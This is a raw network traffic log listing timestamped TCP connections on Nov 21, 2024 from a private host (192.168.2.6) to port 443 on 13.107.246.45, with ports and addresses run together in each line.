                                                                                                                                                                              Nov 21, 2024 08:31:31.309622049 CET49954443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.309665918 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.309788942 CET49954443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.309948921 CET49954443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.309986115 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.359641075 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.359668970 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.359718084 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.359786034 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.359836102 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.360068083 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.360090017 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.360101938 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.360107899 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.361481905 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.361874104 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.361911058 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.362306118 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.362309933 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.362986088 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.363091946 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.363185883 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.363303900 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.363352060 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.655436039 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.658499002 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.658557892 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.658623934 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.658637047 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.658648968 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.658653021 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.661537886 CET49956443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.661576986 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.661643982 CET49956443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.661813021 CET49956443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.661824942 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.805052996 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.808183908 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.808274984 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.808341980 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.808382988 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.808410883 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.808428049 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.812437057 CET49957443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.812464952 CET4434995713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.812556028 CET49957443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.812693119 CET49957443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.812706947 CET4434995713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.856242895 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.856724977 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.856772900 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:31.857178926 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:31.857193947 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:32.299536943 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:32.302561998 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:32.302649975 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:32.302742004 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:32.302742004 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:32.302787066 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:32.302817106 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:32.306092024 CET49958443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:32.306113005 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:32.306193113 CET49958443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:32.306412935 CET49958443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:32.306420088 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.090401888 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.091041088 CET49954443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.091089964 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.091422081 CET49954443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.091429949 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.099133968 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.099466085 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.099524021 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.099826097 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.099838972 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.382822037 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.383495092 CET49956443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.383531094 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.383934975 CET49956443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.383943081 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.535089016 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.535166025 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.535237074 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.535481930 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.535502911 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.535533905 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.535550117 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.535661936 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.535691023 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.535741091 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.535738945 CET49954443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.535792112 CET49954443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.535909891 CET49954443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.535945892 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.535995007 CET49954443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.536011934 CET4434995413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.538899899 CET49959443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.538930893 CET4434995913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.538959980 CET49960443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.538992882 CET4434996013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.539000988 CET49959443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.539041042 CET49960443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.539139986 CET49959443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.539155006 CET4434995913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.539170027 CET49960443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.539182901 CET4434996013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.591993093 CET4434995713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.592705011 CET49957443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.592716932 CET4434995713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.593349934 CET49957443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.593355894 CET4434995713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.815853119 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.818943024 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.819011927 CET49956443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.819021940 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.819081068 CET49956443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.819142103 CET49956443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.819174051 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.819190025 CET49956443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.819200039 CET4434995613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.822141886 CET49961443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.822210073 CET4434996113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:33.822309017 CET49961443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.822520018 CET49961443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:33.822551012 CET4434996113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.023871899 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.024627924 CET49958443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.024672985 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.025073051 CET49958443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.025089025 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.034950018 CET4434995713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.038288116 CET4434995713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.038374901 CET49957443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.038412094 CET49957443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.038428068 CET4434995713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.038439035 CET49957443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.038444042 CET4434995713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.041572094 CET49962443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.041614056 CET4434996213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.041695118 CET49962443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.041856050 CET49962443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.041868925 CET4434996213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.458844900 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.462140083 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.462208033 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.462233067 CET49958443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.462281942 CET49958443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.462372065 CET49958443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.462384939 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.462402105 CET49958443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.462407112 CET4434995813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.465578079 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.465643883 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:34.465749979 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.465960979 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:34.466006041 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.319771051 CET4434996013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.322711945 CET49960443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.322743893 CET4434996013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.323328018 CET49960443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.323333025 CET4434996013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.323683023 CET4434995913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.324136972 CET49959443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.324157000 CET4434995913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.324670076 CET49959443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.324676037 CET4434995913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.607253075 CET4434996113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.608407021 CET49961443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.608460903 CET4434996113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.608906031 CET49961443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.608920097 CET4434996113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.766164064 CET4434996013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.768311977 CET4434995913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.768459082 CET4434996013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.768522024 CET49960443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.768556118 CET49960443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.768573046 CET4434996013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.768585920 CET49960443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.768590927 CET4434996013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.770843983 CET4434995913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.770944118 CET49959443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.771022081 CET49959443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.771051884 CET4434995913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.771071911 CET49959443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.771079063 CET4434995913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.771929026 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.771955013 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.772051096 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.772181988 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.772195101 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.773588896 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.773627996 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.773710966 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.773884058 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.773900032 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.887207985 CET4434996213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.888184071 CET49962443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.888206959 CET4434996213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:35.888729095 CET49962443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:35.888735056 CET4434996213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.052369118 CET4434996113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.052995920 CET4434996113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.053234100 CET49961443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.053234100 CET49961443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.053234100 CET49961443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.056895018 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.056926966 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.057023048 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.057274103 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.057286978 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.311172962 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.311916113 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.311955929 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.312530041 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.312536001 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.342170954 CET4434996213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.345139980 CET4434996213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.345200062 CET49962443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.356355906 CET49961443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.356380939 CET4434996113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.358118057 CET49962443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.358146906 CET4434996213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.358160973 CET49962443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.358166933 CET4434996213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.371367931 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.371397018 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.371603966 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.373338938 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:36.373354912 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.766801119 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.767461061 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:36.767803907 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.035284042 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.035336018 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.035362005 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.035370111 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.048418999 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.048449039 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.048517942 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.056672096 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.056694031 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.555253983 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.555960894 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.555974960 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.556432009 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.556437016 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.622342110 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.622971058 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.623003960 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.623444080 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.623451948 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.772593975 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.773160934 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.773185015 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.773644924 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.773653030 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.998730898 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.998852015 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.998918056 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.999126911 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.999145031 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:37.999157906 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:37.999162912 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.002650976 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.002706051 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.002779961 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.002991915 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.003010035 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.080049038 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.083054066 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.083120108 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.083157063 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.083185911 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.083256006 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.083271980 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.083283901 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.083288908 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.086102962 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.086225033 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.086313009 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.086438894 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.086462975 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.152987003 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.153732061 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.153754950 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.154417992 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.154422998 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.207500935 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.210767984 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.210823059 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.210880041 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.210925102 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.210980892 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.210999012 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.211010933 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.211015940 CET4434996613.107.246.45192.168.2.6
